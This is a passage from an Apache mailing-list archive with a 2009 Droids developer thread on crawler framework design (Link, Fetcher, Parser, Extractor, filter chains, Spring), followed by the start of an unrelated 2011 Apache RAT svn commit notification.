WebServiceWorker that call GAE service do the whole batch of fetch->parser->extract in one go, so there is no local filter. Normal worker shall call every filter after every operation. If the filter return null, it stop processing the link - Filter - When we have a confirmed lifecycle, e.g. poll a link from queue -> fetch entity -> parse entity -> extract outlinks, then we have a filter that allow inteception in between every stage. e.g. public Link polled(Link link) public Fetcher fetched(Link link, Fetcher fetcher) - any filter may influence the flow by changing the component object like Fetcher/Parser, or they may return null and the Worker/TaskMaster shall stop the process for that link. - e.g. Duplicated Link handling could be done as a Filter. a singleton NoRepeatFilter stores a Set of Link ID, and when any link is extracted, it is check against the set and dupliated link will be removed. - It offers a lot of potentially such as providing runtime statistics. - Component filter - e.g. FetchFilter, public void preFetch(Link, Fetcher), postFetch(Link,Fetcher) - component filter is expected to alter fetching behavior. e.g. for preFetch for a http fetcher, the http request shall be available already, and the preFetch could as the fetcher to the concrete class, and modify the content of the HttpRequest before it is executed. e.g. to append http header / cookie depends on any attribute in the Link. - The global / lifecycle filter do filter after every component operations. they are designed for different purpose. 8. Removed concepts based on the above proposal - LinkTask, Task, just keep Link - TaskMaster - with some refactor to assign responsibility to Droids and Worker, the TaskMaster doesn't do too many things, and I suggest to remove this concept. - TaskQueue - just use Queue<Link> - TaskQueueWithHistory - this is eliminated by the filter framework. See the next section. - TaskValidator - eliminate by the filter framework / implement as a Filter - URL Filter - could be implemented as a Filter - Parse(Parse) - merged into Parser, I think "Parse" is a vague concept and we would rather to have a Map return from than have a Parse class any comment? regards, mingfai --0016e646a4004a3f45046cf1b334-- From [email protected] Mon Jun 22 21:23:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11158 invoked from network); 22 Jun 2009 21:23:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2009 21:23:34 -0000 Received: (qmail 65720 invoked by uid 500); 22 Jun 2009 21:23:45 -0000 Delivered-To: [email protected] Received: (qmail 65673 invoked by uid 500); 22 Jun 2009 21:23:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65655 invoked by uid 99); 22 Jun 2009 21:23:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 21:23:45 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yx0-f190.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 21:23:34 +0000 Received: by yxe28 with SMTP id 28so2426384yxe.12 for <[email protected]>; Mon, 22 Jun 2009 14:23:13 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=lDqVexzTG0QafoHgEMxP6ZTpyPwTO/uNVAiqjkQgvmE=; b=t+ZBCgXitlh4WmgkMor9qXd+hKBwUPzWiMMl5AFByD+fMKcwltPvdrlU++q2Q/f4dW VKPQScdow9oFU9hXuQITyFYvytnO0YLer3xndjdHz8T6IwtFTy3NFl8Oa91MifeZ1Rc9 iaN4LVVMh1/fhMkdAORyL4caRzwfcPGuThs0E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=dvcQ0dqci6dXQOGvFNRZqQkID2c8NFuPREn1eJoql/yggxO5SMmgbPIuffOnIqVzyP DmtK6jTAyrf32oSIfR9u2BcJhGh2+deGeNWUNfyec+w8R26WjlODwwgOvWIcqQnoWzrw ivkVwpDalDHEeatV8b7NWZLydCgFeu75Myl0Y= Received: by 161.129.204.104 with SMTP id r15mr1040397agc.98.1245705791378; Mon, 22 Jun 2009 14:23:11 -0700 (PDT) Received: from ?161.129.204.104? ([161.129.204.104]) by mx.google.com with ESMTPS id 5sm29019agc.15.2161.129.204.104.23.10 (version=TLSv1/SSLv3 cipher=RC4-MD5); Mon, 22 Jun 2009 14:23:10 -0700 (PDT) Message-Id: <[email protected]> From: Ryan McKinley <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v935.3) Subject: Re: some proposed ideas for Droids Date: Mon, 22 Jun 2009 17:23:08 -0400 References: <[email protected]> X-Mailer: Apple Mail (2.935.3) X-Virus-Checked: Checked by ClamAV on apache.org For background, I am not (yet) using droids for web crawling -- rather, I use it to manage a bunch of jobs that keep external processes running. It is easy to equate droids with crawling, but I think that is one of many functions (though obviously the most generally relevant) On Jun 22, 2009, at 11:40 AM, Mingfai wrote: > hi, > > I am some proposed idea for discussion. Some of them are design > principles > or concept, and some are more concrete points about design on specific > items. The points are as follows: > > * - indicate items that I consider as major changes > ** > > 1. Use of Java Package > - do not use a org.apache.droids.api package. Just put the API > interface in individual package. > +0 (sure... i have not strong opinion) > - do not use *.impl unless there are 3 or more. (i don't really > have > strong opinion at this point, just don't like to have some impl > package with > just one or two class(es)) > +0 > 2. General coding practice/standard > - use protected instead of private by default. This will allow > users > to extend and replace any of our class easier. > > - do not use final for LinkTask/Link. I have a use case that I > want to > extend Link/LinkTask as a JPA Entity Bean. And JPA doesn't > allow a class > without default constructor, i.e. we can't final the URL field. > For the > classes that are not expected to be subclassed by users, it's > ok to use > final. > > - Use Java standard interface rather than introducing our own > interface unless there are obvious value-added. e.g. replace > TaskQueue with > java.util.Queue<Task> > +1 > - *Use Spring for droids-core > - i.e. allow droids-core depends on Spring > > - a droid needs a whole object graph to work. as a > framework, we > want different components be configurable. It's better to > rely on an IoC > framework to manage the dependency and configuration. Spring > is the most > popular IoC framework. it will also make testing much easier. > and user needs > not to change code (but to change xml) if they want to > change certain > behavior of our core classes. > > - there are some special benefits of using spring, e.g. it > supports > annotation and autowiring. Take an example, I could define a > field like > "@Autowired Collection<Filter> filters", and when I add a new > filter, then, > i create 2 classes like "@Component public class XXXFilter", > and in runtime, > the filters field will be injected with a collection of the 2 > classes. It > makes development and configuration real simple. (and there > are also ways to > change the autowiring behavior) > > - Spring facilitates the use of http remoting. And it is > easy to > replace implementation class to do remoting or other > interception. > Does the *core* really need access to the whole object graph? I totally agree that most specific implementations will need broader access. I think droids power will come from its flexibility / simplicity. Ideally the *core* will have as few dependencies as possible. I agree that sub-project/package that focuses on web crawling could depend on spring. > 3. Specific concept/component. Some of the points in this > section > are just my comment to the concept, but not any proposal for action. > - Droids/Crawler > - Our top level concept. We only use Droid but not Crawler. > I use > the generic term Crawler in this message. > Ya -- the term "droid" was intentionally chosen so that it represents the larger concept of a robot doing something. Crawling is one instance of what it may do. (again, likely the most broadly used) > - Link, LinkTask, Task > - Task is a valid concept. A task is the unit that work by the > worker. > A link refer to the link only. I have no objection to this > concept. But in > implementation, it seems there is no much need to implement > the Task > concept. (naming an interface as "nextTask" is ok but it > seems no need to > have a class or interface called "Task") > > - a crawler works with links.and we don't normally non-link > related > task that goes beyond the scope of a crawler framework. > > - See the Link-centric design bullet for more info about link > > - Fetcher > - we do not use the concept of Fetcher now. I suppose it is > because > Droids is designed to do more than web crawling and non-web > resource is not > "fetched"? In Droids 0.01, Protocol basically represent the > Fetcher (or at > least, Protocol+Worker) +1 -- I think a Fetcher concept is a good idea. It should also be independent of the task interface. When thinking about the fetcher, it may be good to consider VFS (http://commons.apache.org/vfs/) as a first class implementation. > > - I strongly think we should use the term and concept of > Fetcher > because it is a common terminology in crawler. Using common > terms and > language makes our design more intuitive. > > - Parser, Handler, Processor, Extractor etc. these are terms > that > share very similar meaning. No matter how we use them, we need > to give a > strict definition, e.g. in class level JavaDoc comment. My > suggestions: > - Parser - the component that process the raw fetched Entity. > Output data is subject to implementation. One Entity will be > parsed by one > parser only. > > - Extractor - the component to extract out link from entity. > Multiple extractors could be used for a parser. the primary > function is to > extract out link. user may also use it to do other extraction > or operation, > e.g. to store data in the Link, or just consume the parsed > data. A extract > depends directly to a parser. (we can't easily define a > contract between > Parser and Extractor, so let's do not attempt this.) > > Extractor is a new concept. It is splitted from Parser and > diff in > a way that each link shall be parsed once, and multiple > extractor may > perform extraction or custom operation against the parsed > data. I think i > mentioned in another email before. Say when we use > NekoHtmlParser, we want > to parse just once, and maybe extractor1 is for extracting > outlink, and > extractor2 is for custom processing (such as indexing) and > both are based on > the same parsed data. > > - Processor - too vague. do not use this concept, and we are > not > using it anyway. > > - Handler - for event based Parser, it may use a SAX > DefaultHandler. To avoid confusion, let's not to use handler > in other > context. agree. "Parser" and "Extractor" make sense, "Processor" and "Handler" are not clear to me. I know they each have functions that can be reused by each other, but the general terms get confusing. > > - Entity > - I don't have any strong proposal and this section is just to > brainstorm some ideas. It would be good to clarify what we > want to achieve > in providing an Entity hierarchy, given that, the HC project > actually > provides all the Entity already. Our entity is kind of a > wrapper with > buffer.(and HC also have buffered entity) I guess we don't > want to depend on > HttpEntity from HC directly as Droids may touch entity beyond > HttpEntity, > e.g. File (but HC also as FileEntity...) > > - Entity is the contract between Fetcher/Protocol and > Parser. For > Entity, it's unlikely the user need to subclass it. if they > need to subclass > it, they also need to implement a Fetcher/Protocol + Parser. > The value of > sub-classing Entity is not significant. I suggest we just not > design it for > subclassing. > > - Currently, we have a hierarchy of ManagedContentEntity, > ContentEntity, FileContentEntity, HttpContentEntity. For a > file parser and a > http parser, they can't easily use a common Entity interface > and I suppose > the parser implementation has to cast the entity. To me, > "ManagedContentEntity" doesn't give a lot of meaning than > "Entity". > FileEntity and HttpEntity does make a different to me in > concept, but i > don't see how they could be related in implementation. > > - My initial thought about the contract of parse is whether > it can > just take a InputStream. And later i find it is necessary to > have a concept > of Entity that hold information like content/mime type, > encoding/charset, > size/length etc. But diff kind of entity just may have > different attribute > and it's not easy to define a comment contract. One of the > ideas in my mind > is to use a single final Entity class that extend HashMap. > > - For HttpEntity, i do prefer to have a way to retrieve the > original HC HttpEntity object. (but it is unlikely we want to > expose that in > any interface) Notice that the wrapping make it a bit more > complex in > constructing instance in unit test. > I will defer to others on the Entity discussion... I am not really familiar with the concepts > - Worker, Task, TaskMaster > - Make worker implements Runnable, Future.(and not > RunnableFuture > for JDK5 compataibility) and we use run() as its main > interface. So it could > be use as a thread easier. > sure > - I suggest to remove the concept of Task and TaskMaster. A > Droid/Crawler could do most work of the TaskMaster. These > concepts also > confuse with Thread, ThreadFactory, Executor, that creates > many similar > concepts. > maybe -- right now, the Droid interface just handles initialization and callbacks from the TaskMaster. It seems like that is a substantially different concept then keeping a bunch of processes running tasks. > - if we keep TaskMaster, i suggest to make it implements > ExecutorService, and we depends on Java util/concurrency API > rather than a > TaskMaster interface. > seems good. > - Queue > - I suggest to remove the TaskQueue interface and use Queue<? > extends Link> as standard signature. > +1 > 4. Link-centric design > - Link, extends HashMap, will act as a main arbitary data > container, and > a vehicle that store attributes and data thoughout the whole > lifecycle of > fetching, parsing, and extracting. I don't have any strong opinion here.... but I would rather see an API where we can rely on method calls then putting stuff into a Map -- perhaps years of dealing with request.getAttribute() has turned me sour on this model. > > - if we do it extremely, all data can be stored as in the Link > and all > interface could just use a single Link argument, e.g. > parse(Link), > extract(Link). For sure it is not a good idea. So i make every > interface to > include the Link argument as well as key component. I found the > extreme > usage is good in remote web service api, but not good in Java > API. > > - All components to be generic as <? extends Link>, user may use > another Link implementation for the whole Droid operation. an > example is a > WeightedLink. > > - For a Link, only the URL is mandatory. A ID is needed for > implementing an in-memory set/hashtable to reject duplicated > Link quickly. I > suggest to make Link a class so people could create a link with > new Link(" > http://www.apache.org") easily, just like creating URL or URI. > > 5. Non-thread safe interface and fluent API > - take an example, insteaad of "Parse parse()", i suggest the > parser to > store the parsed data inside itself, and we provide a reset() > method to > clear the data for re-use. This design has pro and con. > > - one of main pro is, we could simplify the model by omitting a > Parse > class that is mainly for holding arbitrary data. And we also > can't easily > define the return type of an interface. Take Fetcher as an > example, a > fetcher typically contain a Request and Response object. Should > we have > fetch() to return a FetchedData that has request, response, and > entity? it's > just a bit complex. > > - I hope no one against Fluent API :-). with fluent api, it's > like > "public Fetcher fetch()". And I don't always use Fluent Api, > only use when > it is good and the api call may be chained. e.g. > parser.parse().getDate() > > 6. Factory and LinkMatcher design > - For worker, fetcher and parser, they are provided by users as a > Factory. > > - For FetcherFactory and ParserFactory, new instance are > created with > a newXXX(Link link) > > - So, depends on the Link, the Factory will provide diff > components. > e.g. for http link, it's a HttpFetcher, for File, it's a file > fetcher (not > impl.) for parer, it consults the content type. > > - Every component implemnets a LinkMatcher interface that > checks if a > Fecher/Parser/Extractor supports a particular link. This is > primary for > automatic component registration without a need to explicitly > providing a > mapping upfront. e.g. there might be a PNG parser that checks the > "contentType" attribute of the Link. The parser implemented the > matches() > method. so we don't need to maintain a mapping hashmap between > contentType > and parser. The link matching may be complex so it's hard to use > a mapping > hashmap anyway. together with the filter framework, any > attribute could be > prepared by a filter first, so the factory could always rely on > the matcher > interface to find the correct parser/fetcher. > no real opinion -- everything sounds reasonable. > 7. *Filter Framework > - This is a significant new concept. I propose to have a filter > framework that works as a chain for intercepting the works of > every main > component. There are a main lifecycle filter that is named > Filter, and also > individual component filters such as FetchFilter and > ParseFilter. Lifecycle > filter is called by a Worker. Some works may not support it, > e.g. my > WebServiceWorker that call GAE service do the whole batch of > fetch->parser->extract in one go, so there is no local filter. > Normal worker > shall call every filter after every operation. If the filter > return null, it > stop processing the link > > - Filter > - When we have a confirmed lifecycle, e.g. poll a link from > queue > -> fetch entity -> parse entity -> extract outlinks, then we > have a filter > that allow inteception in between every stage. e.g. > public Link polled(Link link) > public Fetcher fetched(Link link, Fetcher fetcher) > > - any filter may influence the flow by changing the component > object like Fetcher/Parser, or they may return null and the > Worker/TaskMaster shall stop the process for that link. > - e.g. Duplicated Link handling could be done as a Filter. a > singleton NoRepeatFilter stores a Set of Link ID, and when > any link is > extracted, it is check against the set and dupliated link > will be removed. > - It offers a lot of potentially such as providing runtime > statistics. > > - Component filter > - e.g. FetchFilter, public void preFetch(Link, Fetcher), > postFetch(Link,Fetcher) > - component filter is expected to alter fetching behavior. > e.g. for > preFetch for a http fetcher, the http request shall be > available already, > and the preFetch could as the fetcher to the concrete class, > and modify the > content of the HttpRequest before it is executed. e.g. to > append http header > / cookie depends on any attribute in the Link. > - The global / lifecycle filter do filter after every > component > operations. they are designed for different purpose. > sounds good > 8. Removed concepts based on the above proposal > - LinkTask, Task, just keep Link > - TaskMaster - with some refactor to assign responsibility to > Droids > and Worker, the TaskMaster doesn't do too many things, and I > suggest to > remove this concept. > - TaskQueue - just use Queue<Link> > - TaskQueueWithHistory - this is eliminated by the filter > framework. > See the next section. > - TaskValidator - eliminate by the filter framework / implement > as a > Filter > - URL Filter - could be implemented as a Filter > - Parse(Parse) - merged into Parser, I think "Parse" is a vague > concept and we would rather to have a Map return from than have > a Parse > class > ya. > > any comment? In general sounds good. As for flushing out large changes like this -- i think we should discuss it a bit more to make sure everyone is on the same page. Then it probably makes sense to start a personal sandbox: http://svn.apache.org/repos/asf/incubator/droids/sandbox/mingfa where we can see some things in action and then look at migrating things together. ryan From [email protected] Tue Jun 23 06:15:47 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77539 invoked from network); 23 Jun 2009 06:15:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2009 06:15:47 -0000 Received: (qmail 18728 invoked by uid 500); 23 Jun 2009 06:15:58 -0000 Delivered-To: [email protected] Received: (qmail 18680 invoked by uid 500); 23 Jun 2009 06:15:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18670 invoked by uid 99); 23 Jun 2009 06:15:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Jun 2009 06:15:57 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Jun 2009 06:15:48 +0000 Received: by qw-out-1920.google.com with SMTP id 9so1878761qwj.54 for <[email protected]>; Mon, 22 Jun 2009 23:15:27 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=X3SbqKg0y7MaJs7E9+peAzX8kw7whCU3qb+TaOUu7F8=; b=YcZntwwjVZ6xYVR3ZNndugi9HZMg9Wn2v0VTTl8HskoYnUQ0vQqVC1Hfrep28TWFbZ 9uGsoUEVx+vuWBx57hIwiOINOBCwogcX60ZnzLIZcabwU2N1jXPBeNa2asgVEBkmSC0K 9M9ZwrrV4HepS/N5oHmVFTgjAip1NtHhh92QE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=D2Nw+ng4IJ6eCQMSEVdjpGj8KzsJyOOrVbxVWbcNZ9bmDu4SCzyY60VBboQ99ciKid C1Ee5MW4PnQv9WZnrBb1pcccqXO4j0tu5jq4tFdNMRIxhT/08/uqMLbk+lSREbl0Citm w1K+xOIiU6JWgkLppl1puINMy+H5rxQ+zOZUA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id o11mr4804482vcm.95.1245737726970; Mon, 22 Jun 2009 23:15:26 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 23 Jun 2009 14:15:26 +0800 Message-ID: <[email protected]> Subject: Re: some proposed ideas for Droids From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6469bf4b30c3e046cfdeae0 X-Virus-Checked: Checked by ClamAV on apache.org --0016e6469bf4b30c3e046cfdeae0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit hi, On Tue, Jun 23, 2009 at 5:23 AM, Ryan McKinley <[email protected]> wrote: > > > For background, I am not (yet) using droids for web crawling -- rather, I > use it to manage a bunch of jobs that keep external processes running. It > is easy to equate droids with crawling, but I think that is one of many > functions (though obviously the most generally relevant) notice that all of my proposed idea refers to crawling. (and i only use it for web crawling) so some points are actually invalid, e.g. i suggest to remove Task and TaskMaster. They may be valid for core as a generic robot framework. btw, from the "what is it" in the incubator page, "intelligent standalone robot framework" indeed vague to me. other than "framework" that clearly mean it is not a complete application, the other 3 terms are not clear to me. does "standalone" refer to it's not distributed/clustered? I actually expect it Droids to provide a clustered infrastructure to run Droid / execute Task. Say, for web crawling, one could easily get to the bottleneck by adding more threads, and a cluster environment is needed. p.s. the description indeed sounds like the project is for Artificial Intelligence robot. > Does the *core* really need access to the whole object graph? I totally > agree that most specific implementations will need broader access. > > I think droids power will come from its flexibility / simplicity. Ideally > the *core* will have as few dependencies as possible. > > I agree that sub-project/package that focuses on web crawling could depend > on spring. how about split any crawler functionality to a sub-module? and what should stay in the core and what should be in the crawler module? e.g. fetcher and parser, a generic robot may not do fetching and parsing. say, we may define, if certain functionality is needed by more than one module, it should go to the core. Or we could just put everything in core first, and have a concept in mind that we'll do splitting, and split later. It's good to start simple. > > 4. Link-centric design >> - Link, extends HashMap, will act as a main arbitary data container, and >> a vehicle that store attributes and data thoughout the whole lifecycle >> of >> fetching, parsing, and extracting. >> > > I don't have any strong opinion here.... but I would rather see an API > where we can rely on method calls then putting stuff into a Map -- perhaps > years of dealing with request.getAttribute() has turned me sour on this > model. more elaboration at this point, that is mainly for the crawler use case: - for the crawling use case, I propose to make every component (e.g. fetcher, parser) use to a <? extends Link> signature, e.g. PaserFactory<T extends Link> with newParser(T link); Parser<T extends Link> with parse(T link, Entity entity); The raw Link is basically a HashMap. but user that extend Link do not need to use any Map interface and they could implement every method as Java methods, e.g. public class EnhancedLink extends Link{ protected Set<Link> outLinks; //.. getter and setter } And they could implement their own Extractor<? extends Link> that use setOutLink() to store outlink to their own link. - refer to DROIDS-52 (https://issues.apache.org/jira/browse/DROIDS-52), we would want to store minimum data in a Link. Unless one implement a Queue that support passivation, keep putting Link/LinkTask to the Queue/TaskQueue will consume a lot of memory. - The difficult to define normal interface is it's hard to define the interface that will be used in difficult components, and it's not possible to foresee what data user want to attach to the Link. Assume the following crawler flow : polling (a link from queue) -> fetching -> parsing -> extracting Take an example from a real use case that I've encountered before. In fetching, the fetcher has Request and Response. The response contains HTTP headers including Cookie headers. In out link extraction, we may want to create a link with the cookie data. it's no good to pass the response object all the way to the extractor (and it might not be possible when response is not serializable) if it is not a Map like container. Link may have to have a List<HTTPHeader> to handle my requirement. regards, mingfai --0016e6469bf4b30c3e046cfdeae0-- From [email protected] Thu Jun 25 11:38:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69845 invoked from network); 25 Jun 2009 11:38:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2009 11:38:56 -0000 Received: (qmail 46603 invoked by uid 500); 25 Jun 2009 11:39:07 -0000 Delivered-To: [email protected] Received: (qmail 46549 invoked by uid 500); 25 Jun 2009 11:39:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46539 invoked by uid 99); 25 Jun 2009 11:39:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 11:39:07 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 11:38:59 +0000 Received: by qw-out-1920.google.com with SMTP id 5so629154qwf.54 for <[email protected]>; Thu, 25 Jun 2009 04:38:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=s9zVxhYqMc6JlFvRbLiPum7wPkudfJPa1Ps16s/ilpo=; b=NH6ckFVTj2cotgHW9SCBJ8XD/xERHCndH6gS5IDv3yclOgruLWydmfju8xh4seiQ1E UJUzxXdPaxhCjWhvW3yfhSlZJo0YoAtbUynMaeZhgBvNaIO3nfJklqF+4BFFnX0JqJhz uwjlQNopQx9s1EhRUK3SpjfZCULl2LipEqpZ8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=kSY0s5UqGRlwz+lR0YNrdW0BBPx0ImqCuwtwihNeQxT/LVEJLyc5QtOfQrN992fPWN HkfjMKYP/KvR/d4OeoKtE8oMPpW65OvdWkAOioFF538Z3rey5duWtHC5ga5ePk4qf6MC 1UIY1tASuyLcZbgIjPM4CgUeRLiS2iYj/xjDQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i14mr2093899vcj.67.1245929917966; Thu, 25 Jun 2009 04:38:37 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 25 Jun 2009 19:38:37 +0800 Message-ID: <[email protected]> Subject: Re: some proposed ideas for Droids From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6464e242cea56046d2aaa2f X-Virus-Checked: Checked by ClamAV on apache.org --0016e6464e242cea56046d2aaa2f Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit > > > - > > 1. *Filter Framework > - This is a significant new concept. I propose to have a filter > framework that works as a chain for intercepting the works of every main > component. There are a main lifecycle filter that is named Filter, and also > individual component filters such as FetchFilter and ParseFilter. Lifecycle > filter is called by a Worker. Some works may not support it, e.g. my > WebServiceWorker that call GAE service do the whole batch of > fetch->parser->extract in one go, so there is no local filter. Normal worker > shall call every filter after every operation. If the filter return null, it > stop processing the link > > - Filter > - When we have a confirmed lifecycle, e.g. poll a link from queue > -> fetch entity -> parse entity -> extract outlinks, then we have a filter > that allow inteception in between every stage. e.g. > public Link polled(Link link) > public Fetcher fetched(Link link, Fetcher fetcher) > > - any filter may influence the flow by changing the component > object like Fetcher/Parser, or they may return null and the > Worker/TaskMaster shall stop the process for that link. > - e.g. Duplicated Link handling could be done as a Filter. a > singleton NoRepeatFilter stores a Set of Link ID, and when any link is > extracted, it is check against the set and dupliated link will be removed. > - It offers a lot of potentially such as providing runtime > statistics. > > - Component filter > - e.g. FetchFilter, public void preFetch(Link, Fetcher), > postFetch(Link,Fetcher) > - component filter is expected to alter fetching behavior. e.g. > for preFetch for a http fetcher, the http request shall be available > already, and the preFetch could as the fetcher to the concrete class, and > modify the content of the HttpRequest before it is executed. e.g. to append > http header / cookie depends on any attribute in the Link. > - The global / lifecycle filter do filter after every component > operations. they are designed for different purpose. > > > The proposed Filter framework is significantly revised. A diagram worths a thousand words: http://people.apache.org/~mingfai/model/Filter%20Class%20Diagram.png<http://people.apache.org/%7Emingfai/model/Filter%20Class%20Diagram.png> http://people.apache.org/~mingfai/model/Filter%20Sequence%20Diagram.png<http://people.apache.org/%7Emingfai/model/Filter%20Sequence%20Diagram.png> (notice that the diagram may be changed in any time) Additional notes: - Every component has an abstract implementation, e.g. AbstractParser, that implements FilterSupport and provide a method to call every registered filter - Filter configuration could be done by setting a List of filters to the component, or if we can depends on spring, the abstract implementation could be defined to use @Autowired List<XXXFilter> filters; so user just need to annotate their Filter (and include in the Spring component scan) to register a filter. - Filters are sensitive to order. A machanism is provided to sort the filters. e.g. for AbstractFetcher - it has an optional autowired comparator: @Autowired @Qualifier("fetcher.filterComparator") protected Comparator filterComparator - it has a @PostConstruct init() method that checks if there is a filterComparator, if yes, then it sorts the filters List - a WeightComparator is provided and I expect most people will just use that. The WeightComparactor simply checks if the two objects implement Weighted (that has a getWeight():int) and use the weight to decide the order. i've published a JavaDoc: http://people.apache.org/~mingfai/javadoc/<http://people.apache.org/%7Emingfai/javadoc/>(also subject to change in any time) and corresponding source code: https://svn.apache.org/repos/asf/incubator/droids/sandbox/mingfai/src/main/java/org/apache/crawler/ Notice that current code in svn are more for reading than running. I made quick global change to the package names and other configurations and some things may be broken. It's heavily Spring-based and most test cases are written in Groovy. if we want to use them directly, it's better to put them to in sub-module as it's not compatible with the current droids-core (even though the concept are very similar) regards, mingfai --0016e6464e242cea56046d2aaa2f--
From [email protected] Fri Mar 11 13:44:40 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74820 invoked from network); 11 Mar 2011 13:44:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2011 13:44:40 -0000 Received: (qmail 8991 invoked by uid 500); 11 Mar 2011 13:44:40 -0000 Delivered-To: [email protected] Received: (qmail 8961 invoked by uid 500); 11 Mar 2011 13:44:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8954 invoked by uid 99); 11 Mar 2011 13:44:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 13:44:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Mar 2011 13:44:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 417A72388962; Fri, 11 Mar 2011 13:44:16 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1080567 - in /incubator/rat/main/trunk/apache-rat-core/src/test: java/org/apache/rat/ReportTest.java java/org/apache/rat/report/xml/XmlReportFactoryTest.java java/org/apache/rat/report/xml/XmlReportTest.java resources/elements/buildr.rb Date: Fri, 11 Mar 2011 13:44:16 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 11 13:44:15 2011 New Revision: 1080567 URL: http://svn.apache.org/viewvc?rev=1080567&view=rev Log: Add a Ruby test file. Related to RAT-84. Added: 